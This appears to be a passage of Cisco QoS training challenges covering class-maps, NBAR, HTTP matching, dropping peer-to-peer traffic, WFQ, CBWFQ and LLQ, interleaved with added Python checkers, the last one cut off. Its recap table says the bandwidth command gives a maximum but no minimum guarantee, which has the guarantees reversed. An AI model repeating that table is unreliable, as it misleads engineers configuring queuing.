Maximum bandwidth guarantee    Yes                 Yes
Minimum bandwidth guarantee    No                  Yes
Built-in policer               No                  Yes
Provides low latency           No                  Yes

Cisco Router Challenge 141


Outline
This challenge involves the configuration of QoS for different class-maps.
Objectives
The objectives of this challenge are to:

Define access-lists for class-maps.

Example
> en
# config t
(config)# access-list 100 permit udp any any range 16384 32767
(config)# access-list 100 permit tcp any any eq 1720
(config)# access-list 101 permit tcp any any eq 80
(config)# class-map VOIP
(config-cmap)# match access-group 100
(config-cmap)# exit
(config)# class-map DATA
(config-cmap)# match access-group 101
(config-cmap)# exit
(config)# policy-map NEW
(config-pmap)# class VOIP
(config-pmap-c)# priority percent 60
(config-pmap-c)# exit
(config-pmap)# class DATA
(config-pmap-c)# priority percent 40
(config-pmap-c)# exit
(config-pmap)# exit
(config)# int e0
(config-if)# service-policy output NEW

In this case 60% of the bandwidth will be allocated to VoIP traffic, and 40% to HTTP traffic.
To recap, the differences between the bandwidth and priority commands are:

                               bandwidth Command   priority Command
Maximum bandwidth guarantee    Yes                 Yes
Minimum bandwidth guarantee    No                  Yes
Built-in policer               No                  Yes
Provides low latency           No                  Yes
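To make the numeric limits and the class/policy linkage used in these challenges checkable, here is an added example (not NetworkSims code) that lints an MQC snippet against the ranges the `?` help above prints, confirms that every class named in a policy-map has a class-map, and adds up the percentages claimed within one policy-map. The checks and message wording are my own; the constructed inputs are taken from Challenges 141 and 135 above.

```python
"""Lint the class-map / policy-map / service-policy snippets used in these
challenges.  Added example, not NetworkSims code: the numeric ranges are the
ones the IOS '?' help on this page prints, the checks are my own."""

BANDWIDTH_KBPS = (8, 2_000_000)            # bandwidth / priority <8-2000000>
QUEUE_LIMIT_PKTS = (1, 512)                # queue-limit <1-512>
POLICE_BPS = (8_000, 2_000_000_000)        # police <8000-2000000000>
POLICE_BURST_BYTES = (1_000, 512_000_000)  # police burst <1000-512000000>
PERCENT = (1, 100)                         # percent <1-100>


def _in_range(value, rng):
    return rng[0] <= value <= rng[1]


def lint_mqc(config):
    """Return problem strings for an MQC config given one command per line
    with the prompts stripped; an empty list means every check passed."""
    problems = []
    class_maps = set()
    policies = {}       # policy-map name -> class names referenced in it
    percent_used = {}   # policy-map name -> total % claimed via 'percent'
    policy = cls = None
    for raw in config.splitlines():
        words = raw.split()
        if not words:
            continue
        cmd = words[0]
        if cmd == "class-map":
            class_maps.add(words[-1])       # 'class-map X' or 'class-map match-any X'
        elif cmd == "policy-map":
            policy = words[1]
            policies.setdefault(policy, [])
            percent_used.setdefault(policy, 0)
        elif cmd == "class" and policy:
            cls = words[1]
            policies[policy].append(cls)
        elif cmd in ("bandwidth", "priority") and policy:
            if words[1] in ("percent", "remaining"):
                pct = int(words[-1])
                if not _in_range(pct, PERCENT):
                    problems.append(f"{policy}/{cls}: {cmd} percent {pct} outside 1-100")
                if words[1] == "percent":   # 'remaining percent' draws on the leftover pool
                    percent_used[policy] += pct
            else:
                kbps = int(words[1])
                if not _in_range(kbps, BANDWIDTH_KBPS):
                    problems.append(f"{policy}/{cls}: {cmd} {kbps} kbps outside 8-2000000")
        elif cmd == "queue-limit" and policy:
            pkts = int(words[1])
            if not _in_range(pkts, QUEUE_LIMIT_PKTS):
                problems.append(f"{policy}/{cls}: queue-limit {pkts} outside 1-512")
        elif cmd == "police" and policy:
            bps = int(words[1])
            if not _in_range(bps, POLICE_BPS):
                problems.append(f"{policy}/{cls}: police rate {bps} bps outside 8000-2000000000")
            if len(words) > 2 and words[2].isdigit():
                burst = int(words[2])
                if not _in_range(burst, POLICE_BURST_BYTES):
                    problems.append(f"{policy}/{cls}: police burst {burst} bytes outside 1000-512000000")
        elif cmd == "service-policy" and words[-1] not in policies:
            problems.append(f"service-policy {words[-1]}: policy-map not defined")
    # Cross-checks once the whole snippet has been read.
    for name, classes in policies.items():
        for c in classes:
            if c != "class-default" and c not in class_maps:
                problems.append(f"{name}: class {c} has no class-map")
        if percent_used[name] > 100:
            problems.append(f"{name}: percentages total {percent_used[name]}% (> 100%)")
    return problems


# Constructed from Challenge 141 above: 60 % + 40 % of the link, both strict priority.
CHALLENGE_141 = """
class-map VOIP
match access-group 100
class-map DATA
match access-group 101
policy-map NEW
class VOIP
priority percent 60
class DATA
priority percent 40
int e0
service-policy output NEW
"""

# Constructed variant: DATA asks for 50 %, so the two classes oversubscribe the link.
OVERSUBSCRIBED = CHALLENGE_141.replace("priority percent 40", "priority percent 50")

# Constructed from Challenge 135 above: 'police 100 500' is below both minimums the help lists.
CHALLENGE_135 = """
class-map VOIP
match access-group 100
policy-map NEW
class VOIP
police 100 500
int e0
service-policy output NEW
"""
```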

Cisco Router Challenge 142


Outline
This challenge involves the configuration of NBAR, which can be used to define interesting protocols.
Objectives
The objectives of this challenge are to:

Define NBAR parameters.

Example
> en
# config t
(config)# ip nbar pdlm tftp://1.2.3.4/test.pdlm
(config)# ip nbar port-map http tcp 80 8080
(config)# ip nbar port-map ftp tcp 21
(config)# int s0
(config-if)# ip nbar protocol-discovery
Router# sh ip nbar port
port-map bgp            udp 179
port-map bgp            tcp 179
port-map citrix         udp 1604
port-map citrix         tcp 1494
port-map cuseeme        udp 7648 7649 24032
port-map cuseeme        tcp 7648 7649
port-map custom-01      udp 0
port-map custom-01      tcp 0
port-map custom-02      udp 0
port-map custom-02      tcp 0
port-map custom-03      udp 0
port-map custom-03      tcp 0
port-map custom-04      udp 0
port-map custom-04      tcp 0
port-map custom-05      udp 0
port-map custom-05      tcp 0
port-map custom-06      udp 0
port-map custom-06      tcp 0
port-map custom-07      udp 0
port-map custom-07      tcp 0
port-map custom-08      udp 0
port-map custom-08      tcp 0
port-map custom-09      udp 0
port-map custom-09      tcp 0
port-map custom-10      udp 0
port-map custom-10      tcp 0
port-map dhcp           udp 67 68
port-map dns            udp 53
port-map dns            tcp 53
port-map exchange       tcp 135
port-map fasttrack      tcp 1214
port-map finger         tcp 79
port-map ftp            tcp 21
port-map gnutella       tcp 6346 6347 6348 6349 6355 5634
port-map gopher         udp 70
port-map gopher         tcp 70
port-map http           tcp 80
port-map imap           udp 143 220
port-map imap           tcp 143 220
port-map irc            udp 194
port-map irc            tcp 194
port-map kerberos       udp 88 749
port-map kerberos       tcp 88 749
port-map l2tp           udp 1701
port-map ldap           udp 389
port-map ldap           tcp 389
port-map napster        tcp 6699 8875 8888 7777 6700 6666 6677 6688 4444 5555
port-map netbios        udp 137 138
port-map netbios        tcp 137 139
port-map netshow        tcp 1755
port-map nfs            udp 2049
port-map nfs            tcp 2049
port-map nntp           udp 119
port-map nntp           tcp 119
port-map notes          udp 1352
port-map notes          tcp 1352
port-map novadigm       udp 3460 3461 3462 3463 3464 3465
port-map novadigm       tcp 3460 3461 3462 3463 3464 3465
port-map ntp            udp 123
port-map ntp            tcp 123
port-map pcanywhere     udp 22 5632
port-map pcanywhere     tcp 65301 5631
port-map pop3           udp 110
port-map pop3           tcp 110
port-map pptp           tcp 1723
port-map printer        udp 515
port-map printer        tcp 515
port-map rcmd           tcp 512 513 514
port-map rip            udp 520
port-map rsvp           udp 1698 1699
port-map rtspplayer     tcp 554 7070
port-map secure-ftp     tcp 990
port-map secure-http    tcp 443
port-map secure-imap    udp 585 993
port-map secure-imap    tcp 585 993
port-map secure-irc     udp 994
port-map secure-irc     tcp 994
port-map secure-ldap    udp 636
port-map secure-ldap    tcp 636
port-map secure-nntp    udp 563
port-map secure-nntp    tcp 563
port-map secure-pop3    udp 995
port-map secure-pop3    tcp 995
port-map secure-telnet  tcp 992
port-map smtp           tcp 25
port-map snmp           udp 161 162
port-map snmp           tcp 161 162
port-map socks          tcp 1080
port-map sqlnet         tcp 1521
port-map sqlserver      tcp 1433
port-map ssh            tcp 22
port-map streamwork     udp 1558
port-map sunrpc         udp 111
port-map sunrpc         tcp 111
port-map syslog         udp 514
port-map telnet         tcp 23
port-map tftp           udp 69
port-map vdolive        tcp 7000
port-map xwindows       tcp 6000 6001 6002 6003

Cisco Router Challenge 143


Outline
This challenge involves the configuration of NBAR, and limiting the bandwidth for various protocols.
Objectives
The objectives of this challenge are to:

Define NBAR parameters.
Define a traffic queue.

Example
> en
# config t
(config)# ip nbar pdlm tftp://1.2.3.4/test.pdlm
(config)# ip nbar port-map http tcp 80 8080
(config)# ip nbar port-map ftp tcp 21
(config)# class-map cTest
(config-cmap)# match protocol http
(config-cmap)# match protocol ftp
(config-cmap)# match protocol telnet
(config-cmap)# exit
(config)# policy-map pTest
(config-pmap)# class cTest
(config-pmap-c)# bandwidth 512
(config-pmap-c)# exit
(config-pmap)# exit
(config)# int s0
(config-if)# ip nbar protocol-discovery

In this example a traffic queue of 512 kbps is assigned to HTTP, FTP and Telnet traffic.
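As an added example, not part of the NetworkSims page: a small Python model of the port-map classification that the table above describes. It parses rows laid out like the "show ip nbar port-map" listing (the sample rows are constructed), applies an "ip nbar port-map" override the way Challenge 143 does, and classifies a flow by transport and destination port. The assumption that the override replaces the protocol's port list rather than adding to it is mine, and the function names are hypothetical. What it makes visible is that a port-map match keys on nothing but the port: a service moved to an unmapped port is not classified at all, and two protocols mapped to the same port cannot be told apart.

```python
import re
from collections import defaultdict

# Constructed sample in the layout of the "show ip nbar port-map" listing
# above (a handful of rows, not the whole table).
SAMPLE_PORT_MAP = """\
port-map ftp         tcp 21
port-map http        tcp 80
port-map pcanywhere  udp 22 5632
port-map pcanywhere  tcp 65301 5631
port-map ssh         tcp 22
port-map telnet      tcp 23
"""

LINE_RE = re.compile(r"^port-map\s+(\S+)\s+(tcp|udp)\s+([\d\s]+)$")


def parse_port_map(text):
    """Build {(transport, port): [protocol, ...]} from port-map rows."""
    table = defaultdict(list)
    for line in text.splitlines():
        m = LINE_RE.match(line.strip())
        if not m:
            continue          # ignore headers and footers between rows
        name, transport, ports = m.groups()
        for port in ports.split():
            table[(transport, int(port))].append(name)
    return table


def apply_port_map(table, name, transport, ports):
    """Model 'ip nbar port-map <name> <tcp|udp> <port> ...'.

    Assumption: the command replaces the port list of <name> for that
    transport, which is why Challenge 143 re-lists 80 alongside 8080."""
    for key in [k for k, names in table.items()
                if k[0] == transport and name in names]:
        table[key].remove(name)
        if not table[key]:
            del table[key]
    for port in ports:
        table[(transport, port)].append(name)
    return table


def classify(table, transport, dport):
    """Port-map classification keys only on transport + destination port.
    Returns the protocol name, None when the port is unmapped, or
    'ambiguous:a,b' when two protocols claim the same port."""
    names = table.get((transport, dport), [])
    if not names:
        return None
    if len(names) == 1:
        return names[0]
    return "ambiguous:" + ",".join(sorted(names))


def ambiguous_ports(table):
    """Ports mapped to more than one protocol on the same transport."""
    return sorted(k for k, names in table.items() if len(names) > 1)


if __name__ == "__main__":
    table = parse_port_map(SAMPLE_PORT_MAP)
    print(classify(table, "tcp", 8080))          # None: unmapped port
    apply_port_map(table, "http", "tcp", [80, 8080])
    print(classify(table, "tcp", 8080))          # http
    apply_port_map(table, "custom-01", "tcp", [8080])
    print(ambiguous_ports(table))                # [('tcp', 8080)]
```

The last step shows a check worth running after every port-map change: once custom-01 is also mapped to tcp 8080, the classifier cannot say which protocol a flow on that port belongs to, so any policy that drops or rate-limits one of them now hits both.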

Cisco Router Challenge 144


Outline
This challenge involves matching for URL details.
Objectives
The objectives of this challenge are to:

Define match for URL

Example
> en
# config t
(config)# class-map cTest
(config-cmap)# m pro http ?
host Server Host Name
mime Match MIME Type
url  Match URL String
<cr>
(config-cmap)# m pro http url ?
WORD Enter a string as the sub-protocol parameter
(config-cmap)# match protocol http url edinburgh*
(config-cmap)# exit

(config)# policy-map pTest
(config-pmap)# class cTest
(config-pmap-c)# bandwidth 512
(config-pmap-c)# exit
(config-pmap)# exit
(config)# int s0
(config-if)# service-policy output pTest

This matches any URL containing edinburgh, such as http://edinburghnights.com,
http://tourist.com/edinburgh, and so on. The matching characters are:
*    Match zero or more characters
?    Match one character
|    Or
(|)  Match one choice in the parentheses, such as (gif | jpeg)
[]   Match in a range, such as jpeg[0-9]
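Added example (not from the page): the five matching characters listed above turned into a Python regular expression, with the URL, host and MIME rules of Challenges 144 to 148 evaluated against constructed sample requests. The unanchored match follows the page's own statement that edinburgh* matches http://tourist.com/edinburgh; first-match evaluation of the rules and the dropping of whitespace inside (gif | jpeg) are assumptions of mine, and HTTP_RULES, nbar_match and classify_http are hypothetical names. The cisco-fake.example request shows why a prefix pattern such as cisco* deserves a second look before it is tied to a drop action: it matches more hosts than the one intended.

```python
import re


def nbar_pattern_to_regex(pattern):
    """Translate the NBAR wildcard syntax listed above into a Python regular
    expression: '*' zero or more characters, '?' one character, '|' or,
    '( )' a choice, '[ ]' a range. Everything else is literal. Whitespace is
    dropped so '(gif | jpeg)' reads as '(gif|jpeg)' (assumption)."""
    out = []
    for ch in re.sub(r"\s+", "", pattern):
        if ch == "*":
            out.append(".*")
        elif ch == "?":
            out.append(".")
        elif ch in "()|[]-":
            out.append(ch)        # keep regex meaning inside groups/ranges
        else:
            out.append(re.escape(ch))
    return "".join(out)


def nbar_match(pattern, text):
    """Unanchored match, following the text above: 'edinburgh*' matches both
    http://edinburghnights.com and http://tourist.com/edinburgh."""
    return re.search(nbar_pattern_to_regex(pattern), text) is not None


# Constructed policy: one (field, pattern, action) per class-map of
# Challenges 144-148, in configuration order.
HTTP_RULES = [
    ("url",  "edinburgh*", "bandwidth 512"),
    ("host", "cisco*",     "drop"),
    ("mime", "*jpeg",      "drop"),
]


def classify_http(rules, host, url, mime):
    """Return the action of the first rule that matches (assumed first-match
    evaluation), or 'pass' when none does."""
    fields = {"host": host, "url": url, "mime": mime}
    for field, pattern, action in rules:
        if nbar_match(pattern, fields[field]):
            return action
    return "pass"


if __name__ == "__main__":
    # Constructed requests: (host, url, mime)
    for req in [("edinburghnights.com", "http://edinburghnights.com/", "text/html"),
                ("cisco.com", "http://cisco.com/", "text/html"),
                ("cisco-fake.example", "http://cisco-fake.example/", "text/html"),
                ("example.org", "http://example.org/pic", "image/jpeg"),
                ("example.org", "http://example.org/", "text/html")]:
        print(req[0], "->", classify_http(HTTP_RULES, *req))
```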

Cisco Router Challenge 145


Outline
This challenge involves matching for HTTP host details.
Objectives
The objectives of this challenge are to:

Define match for URL host.

Example
> en
# config t
(config)# class-map cTest
(config-cmap)# m pro http host ?
WORD Enter a string as the sub-protocol parameter
(config-cmap)# match protocol http host cisco*
(config-cmap)# exit

(config)# policy-map pTest
(config-pmap)# class cTest
(config-pmap-c)# bandwidth 512
(config-pmap-c)# exit
(config-pmap)# exit
(config)# int s0
(config-if)# service-policy output pTest

This matches any host containing cisco, such as cisco.com, and so on. The matching characters are:
*    Match zero or more characters
?    Match one character
|    Or
(|)  Match one choice in the parentheses, such as (gif | jpeg)
[]   Match in a range, such as jpeg[0-9]

Cisco Router Challenge 146


Outline
This challenge involves dropping packets which match a URL MIME details.
Objectives
The objectives of this challenge are to:

Define match for URL MIME types.

Example
> en
# config t
(config)# class-map cTest
(config-cmap)# m pro http mime ?
WORD Enter a string as the sub-protocol parameter
(config-cmap)# match protocol http mime *jpeg
(config-cmap)# exit

(config)# policy-map pTest
(config-pmap)# class cTest
(config-pmap-c)# bandwidth 512
(config-pmap-c)# exit
(config-pmap)# exit
(config)# int s0
(config-if)# service-policy output pTest

This matches any MIME type of jpeg. Other typical MIME types are gif, mp3, avi, and so on.
The matching characters are:
*    Match zero or more characters
?    Match one character
|    Or
(|)  Match one choice in the parentheses, such as (gif | jpeg)
[]   Match in a range, such as jpeg[0-9]

Cisco Router Challenge 147


Outline
This challenge involves dropping packets which match URL details.
Objectives
The objectives of this challenge are to:

Define match for URL.

Example
> en
# config t
(config)# class-map cTest
(config-cmap)# m pro http ?
host Server Host Name
mime Match MIME Type
url  Match URL String
<cr>
(config-cmap)# m pro http url ?
WORD Enter a string as the sub-protocol parameter
(config-cmap)# match protocol http url edinburgh*
(config-cmap)# exit

(config)# policy-map pTest
(config-pmap)# class cTest
(config-pmap-c)# ?
QoS policy-map class configuration commands:
bandwidth       Bandwidth
compression     Activate Compression
drop            Drop all packets
exit            Exit from QoS class action configuration mode
no              Negate or set default values of a command
police          Police
priority        Strict Scheduling Priority for this Class
queue-limit     Queue Max Threshold for Tail Drop
random-detect   Enable Random Early Detection as drop policy
service-policy  Configure QoS Service Policy
set             Set QoS values
shape           Traffic Shaping
(config-pmap-c)# drop
(config-pmap-c)# exit
(config-pmap)# exit
(config)# int s0
(config-if)# service-policy output pTest

Cisco Router Challenge 148


Outline
This challenge involves dropping packets which match HTTP host details.
Objectives
The objectives of this challenge are to:

Define match for URL host.

Example
> en
# config t
(config)# class-map cTest
(config-cmap)# m pro http host ?
WORD Enter a string as the sub-protocol parameter
(config-cmap)# match protocol http host cisco*
(config-cmap)# exit

(config)# policy-map pTest
(config-pmap)# class cTest
(config-pmap-c)# drop
(config-pmap-c)# exit
(config-pmap)# exit
(config)# int s0
(config-if)# service-policy output pTest

This matches any host containing cisco, such as cisco.com, and so on. The matching characters are:
*    Match zero or more characters
?    Match one character
|    Or
(|)  Match one choice in the parentheses, such as (gif | jpeg)
[]   Match in a range, such as jpeg[0-9]

Cisco Router Challenge 149


Outline
This challenge involves dropping packets which match URL MIME details.
Objectives
The objectives of this challenge are to:

Define match for URL MIME types.

Example
> en
# config t
(config)# class-map cTest
(config-cmap)# m pro http mime ?
WORD Enter a string as the sub-protocol parameter
(config-cmap)# match protocol http mime *jpeg
(config-cmap)# exit

(config)# policy-map pTest
(config-pmap)# class cTest
(config-pmap-c)# drop
(config-pmap-c)# exit
(config-pmap)# exit
(config)# int s0
(config-if)# service-policy output pTest

Cisco Router Challenge 150


Outline
This challenge involves dropping packets which use the Fasttrack protocol (such as for
KaZaA, Morpheus and Grokster).
Objectives
The objectives of this challenge are to:

Define match for Fasttrack file-transfer.


Define the Drop action.

Example
> en
# config t
(config)# class-map cTest
(config-cmap)# match protocol ?
arp            IP ARP
bgp            Border Gateway Protocol
bridge         Bridging
bstun          Block Serial Tunnel
cdp            Cisco Discovery Protocol
citrix         Citrix Traffic
compressedtcp  Compressed TCP
cuseeme        CU-SeeMe desktop video conference
custom-01      Custom protocol custom-01
custom-02      Custom protocol custom-02
custom-03      Custom protocol custom-03
custom-04      Custom protocol custom-04
custom-05      Custom protocol custom-05
custom-06      Custom protocol custom-06
custom-07      Custom protocol custom-07
custom-08      Custom protocol custom-08
custom-09      Custom protocol custom-09
custom-10      Custom protocol custom-10
dhcp           Dynamic Host Configuration
dlsw           Data Link Switching (Direct encapsulation only)
dns            Domain Name Server lookup
egp            Exterior Gateway Protocol
eigrp          Enhanced Interior Gateway Routing Protocol
exchange       MS-RPC for Exchange
fasttrack      FastTrack Traffic - KaZaA, Morpheus, Grokster...
finger         Finger
ftp            File Transfer Protocol
gnutella       Gnutella Traffic - BearShare,LimeWire,Gnotella...
gopher         Gopher
gre            Generic Routing Encapsulation
http           World Wide Web traffic
icmp           Internet Control Message
imap           Internet Message Access Protocol
ip             IP
ipinip         IP in IP (encapsulation)
ipsec          IP Security Protocol (ESP/AH)
ipv6           IPV6
irc            Internet Relay Chat
kazaa2         Kazaa Version 2
kerberos       Kerberos
l2tp           L2F/L2TP tunnel
ldap           Lightweight Directory Access Protocol
llc2           llc2
napster        Napster Traffic
netbios        NetBIOS
netshow        Microsoft Netshow
nfs            Network File System
nntp           Network News Transfer Protocol
notes          Lotus Notes(R)
novadigm       Novadigm EDM
ntp            Network Time Protocol
pad            PAD links
pcanywhere     Symantec pcANYWHERE
pop3           Post Office Protocol
pppoe          PPP over Ethernet
pptp           Point-to-Point Tunneling Protocol
printer        print spooler/lpd
qllc           qllc protocol
rcmd           BSD r-commands (rsh, rlogin, rexec)
rip            Routing Information Protocol
rsrb           Remote Source-Route Bridging
rsvp           Resource Reservation Protocol
rtp            Real Time Protocol
rtspplayer     RTSP players streaming protocol
secure-ftp     FTP over TLS/SSL
secure-http    Secured HTTP
secure-imap    Internet Message Access Protocol over TLS/SSL
secure-irc     Internet Relay Chat over TLS/SSL
secure-ldap    Lightweight Directory Access Protocol over TLS/SSL
secure-nntp    Network News Transfer Protocol over TLS/SSL
secure-pop3    Post Office Protocol over TLS/SSL
secure-telnet  Telnet over TLS/SSL
smtp           Simple Mail Transfer Protocol
snapshot       Snapshot routing support
snmp           Simple Network Management Protocol
socks          SOCKS
sqlnet         SQL*NET for Oracle
sqlserver      MS SQL Server
ssh            Secured Shell
streamwork     Xing Technology StreamWorks player
stun           Serial Tunnel
sunrpc         Sun RPC
syslog         System Logging Utility
telnet         Telnet
tftp           Trivial File Transfer Protocol
vdolive        VDOLive streaming video
vofr           voice over Frame Relay packets
xwindows       X-Windows remote access
(config-cmap)# match protocol fast ?
file-transfer File transfer stream
<cr>
(config-cmap)# match protocol fast file-transfer ?
WORD Enter a string as the sub-protocol parameter
(config-cmap)# match protocol fasttrack file-transfer *
(config-cmap)# exit

(config)# policy-map pTest
(config-pmap)# class cTest
(config-pmap-c)# drop
(config-pmap-c)# exit
(config-pmap)# exit
(config)# int s0
(config-if)# service-policy output pTest

Notes
Fasttrack matches traffic such as KaZaA, Morpheus and Grokster. It is also possible to match
other known peer-to-peer protocols, such as:
(config-cmap)# match protocol napster
(config-cmap)# match protocol kazaa2
(config-cmap)# match protocol gnutella

Cisco Router Challenge 151


Outline
This challenge involves the configuration of QoS for RTP audio and video.
Objectives
The objectives of this challenge are to:

Define QoS for RTP audio and video.

Example
> en
# config t
(config)# class-map AUDIO
(config-cmap)# match protocol rtp ?
audio         Match voice packets
payload-type  Match an explicit PT
video         Match video packets
<cr>
(config-cmap)# match protocol rtp audio ?
<cr>
(config-cmap)# match protocol rtp payload- ?
WORD Enter a string as the sub-protocol parameter
(config-cmap)# match protocol rtp video ?
<cr>
(config-cmap)# match protocol rtp audio
(config-cmap)# exit
(config)# class-map VIDEO
(config-cmap)# match protocol rtp video
(config-cmap)# exit
(config)# policy-map NEW
(config-pmap)# class AUDIO
(config-pmap-c)# priority percent 60
(config-pmap-c)# exit
(config-pmap)# class VIDEO
(config-pmap-c)# priority percent 40
(config-pmap-c)# exit
(config-pmap)# exit
(config)# int e0
(config-if)# service-policy output NEW

Cisco ONT Test Unit 1


Key facts
Unit 1: Cisco VoIP Implementations
VoIP has the following benefits:
Improved productivity.
Access to new types of communication devices.
Lower transmission costs.
Consolidated costs.
More efficient use of bandwidth/equipment.
The components of VoIP include:

IP phone.
Gateways.
Multipoint control units.
Application servers.
Gatekeepers.
Call agents.
Video-end points.

Not available on this version.

Cisco ONT Test Unit 2


Key facts
Unit 2: IP Quality of Service
Not available on this version.

Cisco ONT Test Unit 3


Key facts
Unit 3: Classification, Marking and NBAR
Not available on this version.

Cisco Router Challenge 152


Outline
This challenge involves the configuration of Weighted Fair Queue (WFQ).
> CCNP ONT Area: Unit 4: Congestion Management and Queuing
Objectives
The objectives of this challenge are to:

Define WFQ CDT parameter.


Define WFQ RDQ parameter.
Define Hold-queue size.

Example
> en
# config t
(config)# int s0
(config-if)# fair-queue ?
<1-4096> Congestive Discard Threshold
<cr>
(config-if)# fair-queue 1 ?
<16-4096> Number Dynamic Conversation Queues
<cr>
(config-if)# fair-queue 1 16 ?
<0-1000> Number Reservable Conversation Queues
<cr>
(config-if)# fair-queue 1 16 100
(config-if)# hold-queue ?
<0-4096> Queue length
(config-if)# hold-queue 100 ?
in   Input queue
out  Output queue
(config-if)# hold-queue 100 out ?
<cr>
(config-if)# hold-queue 100 out

Defaults are:
Congestive discard threshold  64 messages
Dynamic queues                256 queues
Reservable queues             0 queues

Cisco Router Challenge 153


Outline
This challenge involves the configuration of Class-based Weighted Fair Queue (CBWFQ).
> CCNP ONT Area: Unit 4: Congestion Management and Queuing
Objectives
The objectives of this challenge are to:

Define CBWFQ.

Example
> en
# config t
(config)# access-list 100 permit udp any any range 16384 32767
(config)# access-list 100 permit tcp any any eq 1720
(config)# access-list 101 permit tcp any any eq 80
(config)# class-map VOIP
(config-cmap)# match access-group 100
(config-cmap)# exit
(config)# class-map DATA
(config-cmap)# match access-group 101
(config-cmap)# exit
(config)# policy-map NEW
(config-pmap)# class VOIP
(config-pmap-c)# bandwidth 128
(config-pmap-c)# queue-limit 60
(config-pmap-c)# exit
(config-pmap)# class DATA
(config-pmap-c)# bandwidth 64
(config-pmap-c)# queue-limit 80
(config-pmap-c)# exit
(config-pmap)# class class-default
(config-pmap-c)# fair-queue 16
(config-pmap-c)# exit
(config-pmap)# exit
(config)# int e0
(config-if)# service-policy output NEW

Defaults are:
Congestive discard threshold  64 messages
Dynamic queues                256 queues
Reservable queues             0 queues

Cisco Router Challenge 154


Outline
This challenge involves the configuration of Class-based Weighted Fair Queue (CBWFQ).
> CCNP ONT Area: Unit 4: Congestion Management and Queuing
Objectives
The objectives of this challenge are to:

Define CBWFQ.

Example
> en
# config t
(config)# access-list 100 permit udp any any range 16384 32767
(config)# access-list 100 permit tcp any any eq 1720
(config)# access-list 101 permit tcp any any eq 80
(config)# class-map VOIP
(config-cmap)# match access-group 100
(config-cmap)# exit
(config)# class-map DATA
(config-cmap)# match access-group 101
(config-cmap)# exit
(config)# policy-map NEW
(config-pmap)# class VOIP
(config-pmap-c)# bandwidth percent 60
(config-pmap-c)# queue-limit 60
(config-pmap-c)# exit
(config-pmap)# class DATA
(config-pmap-c)# bandwidth percent 40
(config-pmap-c)# queue-limit 80
(config-pmap-c)# exit
(config-pmap)# class class-default
(config-pmap-c)# fair-queue 16
(config-pmap-c)# exit
(config-pmap)# exit
(config)# int e0
(config-if)# service-policy output NEW

Cisco Router Challenge 155


Outline
This challenge involves the configuration of Class-based Weighted Fair Queue (CBWFQ).
> CCNP ONT Area: Unit 4: Congestion Management and Queuing
Objectives
The objectives of this challenge are to:

Define CBWFQ.

Example
> en
# config t
(config)# access-list 100 permit udp any any range 16384 32767
(config)# access-list 100 permit tcp any any eq 1720
(config)# access-list 101 permit tcp any any eq 80
(config)# class-map VOIP
(config-cmap)# match access-group 100
(config-cmap)# exit
(config)# class-map DATA
(config-cmap)# match access-group 101
(config-cmap)# exit
(config)# policy-map NEW
(config-pmap)# class VOIP
(config-pmap-c)# bandwidth ?
<8-2000000>  Kilo Bits per second
percent      % of total Bandwidth
remaining    % of the remaining bandwidth
(config-pmap-c)# bandwidth r ?
percent  % of the remaining bandwidth
(config-pmap-c)# bandwidth remaining percent 60
(config-pmap-c)# queue-limit 60
(config-pmap-c)# exit
(config-pmap)# class DATA
(config-pmap-c)# bandwidth remaining percent 40
(config-pmap-c)# queue-limit 80
(config-pmap-c)# exit
(config-pmap)# class class-default
(config-pmap-c)# fair-queue 16
(config-pmap-c)# exit
(config-pmap)# exit
(config)# int e0
(config-if)# service-policy output NEW

Cisco Router Challenge 156


Outline
This challenge involves the configuration of Low-Latency Queue (LLQ).
> CCNP ONT Area: Unit 4: Congestion Management and Queuing
Objectives
The objectives of this challenge are to:

Define LLQ

Example
> en
# config t
(config)# access-list 100 permit udp any any range 16384 32767
(config)# access-list 100 permit tcp any any eq 1720
(config)# access-list 101 permit tcp any any eq 80
(config)# class-map VOIP
(config-cmap)# match access-group 100
(config-cmap)# exit
(config)# class-map DATA
(config-cmap)# match access-group 101
(config-cmap)# exit
(config)# policy-map NEW
(config-pmap)# class VOIP
(config-pmap-c)# priority 50
(config-pmap-c)# exit
(config-pmap)# class DATA
(config-pmap-c)# bandwidth 50
(config-pmap-c)# exit
(config-pmap)# class class-default
(config-pmap-c)# fair-queue 16
(config-pmap-c)# exit
(config-pmap)# exit
(config)# int e0
(config-if)# service-policy output NEW
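Added example, not part of the challenges: a Python check that works out what Challenges 153 to 156 actually guarantee to each class before the policy-map is applied. It assumes the IOS default max-reserved-bandwidth of 75%, takes bandwidth percent as a percentage of the link, bandwidth remaining percent as a percentage of the reservable share left after the priority and fixed-kbps classes, and applies the classic CBWFQ rule that one policy-map cannot mix the kbps, percent and remaining percent forms; those modelling choices and the name allocate_bandwidth are mine. Run against a 1544 kbps serial link it shows that the 60%/40% split of Challenge 154 reserves the whole link and would be refused under the default cap, while the remaining percent form of Challenge 155 fits.

```python
def allocate_bandwidth(link_kbps, classes, max_reserved_pct=75):
    """Work out the kbps each class of a policy-map is guaranteed.

    classes: list of (name, form, value) where form is
      "priority"  -> 'priority <kbps>' (LLQ; policed to <kbps> under congestion)
      "bandwidth" -> 'bandwidth <kbps>'
      "percent"   -> 'bandwidth percent <n>' (n % of the link)
      "remaining" -> 'bandwidth remaining percent <n>' (n % of the reservable
                     share left after priority and fixed classes; assumption)
    max_reserved_pct models the max-reserved-bandwidth default of 75 %.
    Returns (allocations in kbps, list of rule violations)."""
    reservable = link_kbps * max_reserved_pct / 100.0
    errors = []

    # Classic CBWFQ: every non-priority class must use the same form (assumption).
    forms = {form for _, form, _ in classes if form != "priority"}
    if len(forms) > 1:
        errors.append("mixed bandwidth forms in one policy-map: "
                      + ", ".join(sorted(forms)))

    alloc = {}
    fixed = 0.0                      # kbps taken by priority/kbps/percent classes
    for name, form, value in classes:
        if form in ("priority", "bandwidth"):
            alloc[name] = float(value)
        elif form == "percent":
            alloc[name] = link_kbps * value / 100.0
        else:
            continue
        fixed += alloc[name]

    if fixed > reservable:
        errors.append(f"{fixed:.0f} kbps reserved exceeds the {reservable:.0f} kbps "
                      f"({max_reserved_pct}%) reservable on a {link_kbps} kbps link")

    remaining = max(reservable - fixed, 0.0)
    for name, form, value in classes:
        if form == "remaining":
            alloc[name] = remaining * value / 100.0

    pct = sum(v for _, f, v in classes if f in ("percent", "remaining"))
    if pct > 100:
        errors.append(f"percentages add up to {pct}%, more than 100%")
    return alloc, errors


if __name__ == "__main__":
    # Challenge 154 on a T1 (1544 kbps): percent of the link.
    print(allocate_bandwidth(1544, [("VOIP", "percent", 60), ("DATA", "percent", 40)]))
    # Challenge 155: percent of what remains inside the 75 % cap.
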